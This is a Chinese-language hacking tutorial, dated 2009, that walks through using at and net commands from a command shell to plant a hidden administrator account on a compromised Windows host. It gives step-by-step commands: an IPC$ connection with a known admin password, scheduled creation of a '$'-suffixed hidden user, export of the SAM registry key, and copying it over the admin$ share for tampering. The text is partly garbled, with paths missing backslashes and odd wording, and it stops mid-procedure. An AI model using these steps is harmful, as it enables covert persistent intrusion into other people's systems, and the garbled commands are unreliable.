简单程序

　两、如何在命令行下远程建立隐躲的超级用户

　　在这里将用at的命令，因为用at发生的方案任务是以系统身份运行的，所以也用没有到psu.exe程序.为了可以运用at命令，肉鸡必需开有schedule的效力，假如没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程发动，当然其办法也可以，只要能发动schedule效力就行.

　　关于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet效力，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以.

　　1、首先找到一台肉鸡，至于如何来找那没有是我这里所说的话题.这里先假定找到一台超级用户为administrator，密码为12345678的肉鸡，现在我们开端在命令行下远程为它建立隐躲的超级用户.(例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238，，请勿在互联网上对号入座，免得骚扰正常的ip地址.)

　　2、先与肉鸡建立连接，命令为：net use 13.50.97.238ipc$ "12345678" /user:"administrator

　　3、用at命令在肉鸡上建立一个用户(假如at效力没有发动，可用小榕的netsvc.exe或sc.exe来远程发动)：

　　at 13.50.97.238 12:51 c:\winntsystem32net.exe user hacker$ 1234 /add

　　建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将没有显示这个用户，但在帐户管理器却能看到这个用户.

　　4、同样用at命令导出HKEY_LOCAL_MACHINEsamsamDomainsaccountusers下键值：

　　at 13.50.97.238 12:55 c:\winntregedit.exe /e hacker.reg

　　HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers

　　/e 是regedit.exe的参数，在_LOCAL_MACHINESAMSAMDomainsaccountusers这个键的必定要以结尾.必要的状况下可以用引号将“c:\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”引起来.

　　5、将肉鸡上的hacker.reg到原机上用记事原打开进行编辑命令为：

　　copy 13.50.97.238admin$system32hacker.reg c:\hacker.reg

　　改正的办法图形界中已经引见过了，这里就没有作引见了.

　　6、再将编辑好的hacker.reg拷回肉鸡上

　　copy c:\hacker.reg 13.50.97.238admin$system32hacker1.reg

更新时间:2009-09-10